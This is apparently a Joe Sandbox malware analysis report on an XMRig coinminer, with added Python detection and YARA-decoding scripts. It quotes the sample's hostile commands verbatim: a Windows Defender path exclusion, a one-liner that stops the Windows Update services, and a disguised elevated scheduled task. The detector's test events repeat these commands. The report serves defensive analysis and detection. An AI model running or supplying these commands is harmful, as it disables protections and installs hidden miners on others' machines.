
Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 884914
MD5: eee7b971e0b76a0df56bdac2ac2fa343
SHA1: c80f9d9de5d0dff115bbb7638554dade321d7c65
SHA256: ecd60313ba990f1300b37db4064977e83f109fdf93a728cf434106c1b5b5a2d5
Tags: exe, x64

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Sigma detected: Stop multiple services
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Yara detected PersistenceViaHiddenTask
Sample is not signed and drops a device driver
Allocates memory in foreign processes
Hooks processes query functions (used to hide processes)
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign process
Found hidden mapped module (file has been removed from disk)
Contains functionality to inject code into remote processes
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hooks files or directories query functions (used to hide files and directories)
Contains functionality to compare user and computer (likely to detect sandboxes)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Modifies existing windows services
PE file contains an invalid checksum
Drops PE files
Found evasive API chain checking for process token information
Creates driver files
Contains functionality to detect virtual machines (SLDT)
PE / OLE file has an invalid certificate
PE file contains more sections than normal
Found evasive API chain (may stop execution after accessing registry keys)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Classification chart (image not preserved). Axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Scale: clean, suspicious, malicious.
  • System is w10x64
  • file.exe (PID: 7028 cmdline: C:\Users\user\Desktop\file.exe MD5: EEE7B971E0B76A0DF56BDAC2AC2FA343)
    • dialer.exe (PID: 6996 cmdline: C:\Windows\System32\dialer.exe MD5: 0EC74656A7F7667DD94C76081B111827)
      • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F9017F2DC455AD373DF036F5817A8870)
      • lsass.exe (PID: 612 cmdline: C:\Windows\system32\lsass.exe MD5: 317340CD278A374BCEF6A30194557227)
        • WMIADAP.exe (PID: 5900 cmdline: wmiadap.exe /F /T /R MD5: 9783D0765F31980950445DFD40DB15DA)
      • svchost.exe (PID: 740 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 904 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • dwm.exe (PID: 992 cmdline: dwm.exe MD5: 70073A05B2B43FFB7A625708BB29E7C7)
      • svchost.exe (PID: 356 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 464 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1048 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1064 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: 32569E403279B3FD2EDB7EBD036273FA)
        • dxpserver.exe (PID: 2700 cmdline: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe MD5: EEE7B971E0B76A0DF56BDAC2AC2FA343)
      • svchost.exe (PID: 1120 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1208 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1304 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1376 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Themes MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1384 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s EventSystem MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1396 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1496 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1548 cmdline: c:\windows\system32\svchost.exe -k appmodel -p -s camsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1556 cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s AudioEndpointBuilder MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1564 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s FontCache MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1664 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1716 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s nsi MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1724 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1796 cmdline: c:\windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1820 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1828 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s Dhcp MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • powershell.exe (PID: 7000 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cmd.exe (PID: 6760 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 5976 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)
    • sc.exe (PID: 7068 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)
    • sc.exe (PID: 3172 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)
    • sc.exe (PID: 5672 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)
    • sc.exe (PID: 5656 cmdline: sc stop dosvc MD5: D79784553A9410D15E04766AAAB77CD6)
  • powershell.exe (PID: 3804 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iejbryoj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'sethc' /tr '''C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'sethc' -RunLevel 'Highest' -Force; } MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 3952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 4500 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 3572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cmd.exe (PID: 868 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 5164 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)
    • sc.exe (PID: 7008 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)
    • sc.exe (PID: 3360 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)
    • sc.exe (PID: 1464 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)
  • cleanup
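The tree above shows the sample's host-side moves in clear text: a Defender path exclusion covering the whole user profile and Program Files (Add-MpPreference), a cmd.exe one-liner stopping the Windows Update stack (UsoSvc, WaaSMedicSvc, wuauserv, bits, dosvc), and an at-logon scheduled task named 'sethc' that runs dxpserver.exe from AppData\Roaming with the highest run level, all after dialer.exe was spawned from the Desktop executable. The detection logic below is an added example, not part of the Joe Sandbox report and not Joe Security's Sigma rule; it runs over constructed process-creation events whose command lines are copied from the tree (the scheduled-task one shortened) and whose parent links for the cmd.exe and powershell.exe children are assumed, since the report does not show their parent image. The event field names and the allow-list of expected System32 children are assumptions to tune per estate.

```python
"""Added example (not from the Joe Sandbox report): detection logic for the
defence-impairment and persistence steps visible in the process tree above,
run over constructed process-creation events (Sysmon ID 1 / Security 4688
carry at least these fields; the attribute names here are assumed)."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    image: str     # full path of the created process
    parent: str    # full path of the parent process
    cmdline: str


# Services the sample stops: losing them blinds Windows Update and Defender
# platform updates, which is why miners go after exactly this set.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
# Windows accessibility binaries whose names get reused as decoys (editor's list).
ACCESSIBILITY_NAMES = {"sethc", "utilman", "osk", "narrator", "magnify"}
# System32 children a user-launched executable legitimately spawns (assumption).
EXPECTED_CHILDREN = {"cmd.exe", "conhost.exe", "powershell.exe"}

SC_STOP = re.compile(r"\bsc(?:\.exe)?\s+stop\s+([A-Za-z0-9_.-]+)", re.I)
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(desktop|appdata|downloads)\\", re.I)
SYSTEM32 = re.compile(r"^c:\\windows\\system32\\", re.I)
CREATE_TASK = re.compile(r"register-scheduledtask|schtasks(?:\.exe)?\s+/create", re.I)
RUN_HIGHEST = re.compile(r"-runlevel\s+['\"]?highest|/rl\s+highest", re.I)
TASK_NAME = re.compile(r"(?:-taskname|/tn)\s+['\"]?([\w.-]+)", re.I)


def stop_multiple_services(ev, threshold=3):
    """Sigma-style 'stop multiple services': N distinct `sc stop` in one command line."""
    svcs = {s.lower() for s in SC_STOP.findall(ev.cmdline)}
    if len(svcs) < threshold:
        return None
    return {"rule": "stop_multiple_services", "pid": ev.pid,
            "services": sorted(svcs), "hits_update_stack": bool(svcs & UPDATE_SERVICES)}


def defender_exclusion(ev):
    """Add-MpPreference -ExclusionPath; whole-profile exclusions are the worst case."""
    c = ev.cmdline.lower()
    if "add-mppreference" not in c or "-exclusionpath" not in c:
        return None
    broad = any(p in c for p in ("$env:userprofile", "$env:programfiles", "$env:systemdrive"))
    return {"rule": "defender_exclusion", "pid": ev.pid, "broad_path": broad}


def elevated_logon_task(ev):
    """Task created with highest run level whose action lives in a user-writable
    directory; also flags a task name that mimics a system binary and the
    throw-away `<#...#>` comment used to pad the command line."""
    c = ev.cmdline
    if not (CREATE_TASK.search(c) and RUN_HIGHEST.search(c) and USER_WRITABLE.search(c)):
        return None
    m = TASK_NAME.search(c)
    name = m.group(1).lower() if m else ""
    return {"rule": "elevated_logon_task", "pid": ev.pid, "task": name,
            "mimics_system_binary": name in ACCESSIBILITY_NAMES,
            "junk_comment": bool(re.search(r"<#\w*#>", c))}


def system_binary_from_user_path(ev):
    """A System32 binary spawned by an executable running from a user-writable
    path: the usual prelude to hollowing it (here dialer.exe) and injecting on."""
    child = ev.image.rsplit("\\", 1)[-1].lower()
    if SYSTEM32.match(ev.image) and USER_WRITABLE.search(ev.parent) and child not in EXPECTED_CHILDREN:
        return {"rule": "system_binary_from_user_path", "pid": ev.pid,
                "child": child, "parent": ev.parent}
    return None


RULES = (stop_multiple_services, defender_exclusion, elevated_logon_task,
         system_binary_from_user_path)


def analyse(events):
    """Apply every rule to every event; return the list of findings."""
    return [f for ev in events for rule in RULES if (f := rule(ev))]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
DIALER = r"C:\Windows\System32\dialer.exe"
DROPPER = r"C:\Users\user\Desktop\file.exe"
EXPLORER = r"C:\Windows\explorer.exe"
TASK_CMD = PS + r""" <#iejbryoj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'sethc' /tr '''C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -TaskName 'sethc' -RunLevel 'Highest' -Force; }"""

# Constructed events: command lines from the tree, parent links assumed.
EVENTS = [
    ProcEvent(7028, DROPPER, EXPLORER, DROPPER),
    ProcEvent(6996, DIALER, DROPPER, DIALER),
    ProcEvent(7000, PS, DIALER, PS + " Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"),
    ProcEvent(6760, CMD, DIALER, CMD + " /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc"),
    ProcEvent(3804, PS, DIALER, TASK_CMD),
    ProcEvent(5555, CMD, EXPLORER, CMD + " /c sc stop Spooler"),   # one service: below threshold
]

if __name__ == "__main__":
    for finding in analyse(EVENTS):
        print(finding)
```

The single `sc stop Spooler` event is there on purpose: the service-stop rule only fires on the count of distinct services in one command line, so an admin stopping one service stays quiet while the five-service chain from the tree does not.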
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys | PUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9n | Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.bin | Florian Roth |
  • 0x1789:$: 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30
  • 0x1749:$: 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4F 00 70 00 65 00 6E 00 4C 00 69 00 62 00 53 00 79 00 73 00 2E 00 6F 00 72 00 67
  • 0x17c5:$: 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 31 00 2E 00 32 00 2E 00 30 00 2E 00 35
  • 0x1949:$: 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 2E 00 32 00 2E 00 30 00 2E 00 35
  • 0x17f5:$: 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 00 2E 00 73 00 79 00 73
  • 0x1915:$: 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30
  • 0x18d1:$: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 00 2E 00 73 00 79 00 73
  • 0x1831:$: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 30 ...
C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp | XMRIG_Monero_Miner | Detects Monero mining software | Florian Roth (Nextron Systems) |
  • 0x4d1250:$s1: 'h' hashrate, 'p' pause, 'r' resume
  • 0x4c8e86:$s2: --cpu-affinity
  • 0x4c8ea0:$s3: set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
  • 0x4c86a8:$s4: password for mining server
C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth (Nextron Systems) |
  • 0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen |
  • 0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu
  • 0x4d1fc8:$s3: \\.\WinRing0_
  • 0x4ca4c8:$s4: pool_wallet
  • $s5: cryptonight at 0x4c62d0, 0x4c62e0, 0x4c62f0, 0x4c6300, 0x4c6318, 0x4c6328, 0x4c6338, 0x4c6350, 0x4c6360, 0x4c6378, 0x4c6390, 0x4c63a0, 0x4c63b0, 0x4c63c0, 0x4c63d8, 0x4c63f0, 0x4c6400, 0x4c6410
(1 further entry not shown)
Source | Rule | Description | Author | Strings
00000017.00000003.708438407.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security |
00000017.00000003.585943996.000001FDE600F000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security |
00000017.00000002.772856939.000001FDE6010000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security |
00000017.00000000.562936177.000001FDE5F5F000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security |
00000017.00000002.770922577.000001FDE5F5F000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security |
(5 further entries not shown)
Source | Rule | Description | Author | Strings
31.2.dxpserver.exe.7ff652ae4520.7.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
31.2.dxpserver.exe.7ff652abfa80.5.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
31.2.dxpserver.exe.7ff652ae4520.7.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
31.2.dxpserver.exe.7ff652ae0c40.8.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
31.2.dxpserver.exe.7ff652f15b40.6.unpack | XMRIG_Monero_Miner | Detects Monero mining software | Florian Roth (Nextron Systems) |
  • 0x4d0250:$s1: 'h' hashrate, 'p' pause, 'r' resume
  • 0x4c7e86:$s2: --cpu-affinity
  • 0x4c7ea0:$s3: set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
  • 0x4c76a8:$s4: password for mining server
(14 further entries not shown)
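The WR64.sys hit above is the LOLDrivers rule keying on VersionInfo strings, not on the file name or its hash: every hex string in that match is a UTF-16LE StringFileInfo key followed by its value (FileDescription = WinRing0, CompanyName = OpenLibSys.org, FileVersion = 1.2.0.5, InternalName = WinRing0.sys, and so on). The script below is an added example, not part of the report and not code from the signature-base project: it decodes the seven complete patterns (the truncated LegalCopyright one is left out), rebuilds a VS_VERSIONINFO String table that carries the same values using the documented String-structure layout, and confirms the patterns match it whatever the file is called on disk. The rule's actual condition is not reproduced, only its strings.

```python
"""Added example (not from the Joe Sandbox report or the signature-base
project): what the PUA_VULN_Driver_OpenLibSysorg_WinRingsys rule keys on.
Each reported hex string is a UTF-16LE VersionInfo key followed by its value;
we decode the seven complete ones, rebuild a VS_VERSIONINFO 'String' table
carrying the same values, and scan it for the raw patterns."""
import struct

# Hex strings as printed in the report (the LegalCopyright one is truncated
# on the page and is therefore not reproduced).
RULE_HEX = [
    "00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30",
    "00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4F 00 70 00 65 00 6E 00 4C 00 69 00 62 00 53 00 79 00 73 00 2E 00 6F 00 72 00 67",
    "00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 31 00 2E 00 32 00 2E 00 30 00 2E 00 35",
    "00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 2E 00 32 00 2E 00 30 00 2E 00 35",
    "00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 00 2E 00 73 00 79 00 73",
    "00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30",
    "00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 57 00 69 00 6E 00 52 00 69 00 6E 00 67 00 30 00 2E 00 73 00 79 00 73",
]


def decode_pattern(hex_str):
    """Return (key, value) for one rule string.  The pattern starts on the NUL
    high byte that precedes the key's first character and stops before the
    value's final NUL, so shift by one byte to get valid UTF-16LE."""
    raw = bytes.fromhex(hex_str)
    text = (raw[1:] + b"\x00").decode("utf-16-le")
    key, value = [part for part in text.split("\x00") if part]
    return key, value


def string_entry(key, value):
    """One VS_VERSIONINFO 'String' structure: wLength, wValueLength (in WCHARs,
    NUL included), wType = 1 (text), szKey, padding to a 32-bit boundary, Value.
    Trailing padding keeps the next entry aligned; the padding is exactly what
    puts 2 or 4 NUL bytes between key and value in the rule strings."""
    key_b = key.encode("utf-16-le") + b"\x00\x00"
    val_b = value.encode("utf-16-le") + b"\x00\x00"
    pad = b"\x00" * (-(6 + len(key_b)) % 4)
    entry = struct.pack("<HHH", 6 + len(key_b) + len(pad) + len(val_b), len(val_b) // 2, 1)
    entry += key_b + pad + val_b
    return entry + b"\x00" * (-len(entry) % 4)


def build_string_table(fields):
    """Concatenate String entries.  The enclosing VS_VERSIONINFO / StringFileInfo /
    StringTable headers are omitted because the patterns do not depend on them."""
    return b"".join(string_entry(k, v) for k, v in fields.items())


def scan(buf, hex_patterns=RULE_HEX):
    """Per pattern: decoded key/value and the offset of the raw bytes (-1 if absent)."""
    hits = []
    for hx in hex_patterns:
        key, value = decode_pattern(hx)
        hits.append({"key": key, "value": value, "offset": buf.find(bytes.fromhex(hx))})
    return hits


def matched_count(buf, hex_patterns=RULE_HEX):
    return sum(1 for h in scan(buf, hex_patterns) if h["offset"] >= 0)


# Values recovered from the rule's own strings.
WINRING0_FIELDS = {
    "FileDescription": "WinRing0", "CompanyName": "OpenLibSys.org",
    "FileVersion": "1.2.0.5", "ProductVersion": "1.2.0.5",
    "InternalName": "WinRing0.sys", "ProductName": "WinRing0",
    "OriginalFilename": "WinRing0.sys",
}

if __name__ == "__main__":
    blob = build_string_table(WINRING0_FIELDS)
    for h in scan(blob):
        print(f"{h['key']:17s} = {h['value']:15s} at 0x{h['offset']:x}")
    # Renaming the driver to WR64.sys changes nothing here; editing the resource does.
    edited = build_string_table({**WINRING0_FIELDS, "CompanyName": "Example Corp"})
    print("patterns matched after editing CompanyName:", matched_count(edited), "/ 7")
```

The last two lines are the caveat a responder should keep in mind: a dropped copy renamed to WR64.sys or anything else still matches, but an attacker who rewrites the version resource drops out of this string-based rule, so pair it with the driver's hash and with the `\\.\WinRing0_` device name the coinminer rule above already picks up in the miner payload.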

Operating System Destruction

Source: Process started; Author: Joe Security
Data:
  Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\System32\cmd.exe
  NewProcessName: C:\Windows\System32\cmd.exe
  OriginalFileName: C:\Windows\System32\cmd.exe
  ParentCommandLine: (empty)
  ParentImage: (empty)
  ParentProcessId: 3452
  ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  ProcessId: 6760
  ProcessName: cmd.exe

Timestamp: 06/09/23-13:30:16.918144
Source IP: 192.168.2.6
Destination IP: 188.165.24.131
SID: 2035420
Source Port: 49711
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 06/09/23-13:30:16.918144
Source IP: 192.168.2.6
Destination IP: 188.165.24.131
SID: 2011341
Source Port: 49711
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 06/09/23-13:31:25.852328
Source IP: 192.168.2.6
Destination IP: 188.165.24.131
SID: 2011341
Source Port: 49713
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 06/09/23-13:31:25.852328
Source IP: 192.168.2.6
Destination IP: 188.165.24.131
SID: 2035420
Source Port: 49713
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection

Source: file.exe; ReversingLabs: Detection: 40%
Source: file.exe; Virustotal: Detection: 35%
Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp; ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp; Virustotal: Detection: 64%
Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe; ReversingLabs: Detection: 40%

Bitcoin Miner

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 31.2.dxpserver.exe.7ff652ae4520.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.dxpserver.exe.7ff652abfa80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.dxpserver.exe.7ff652ae4520.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.dxpserver.exe.7ff652ae0c40.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 31.2.dxpserver.exe.7ff652f15b40.6.unpack, type: UNPACKEDPE
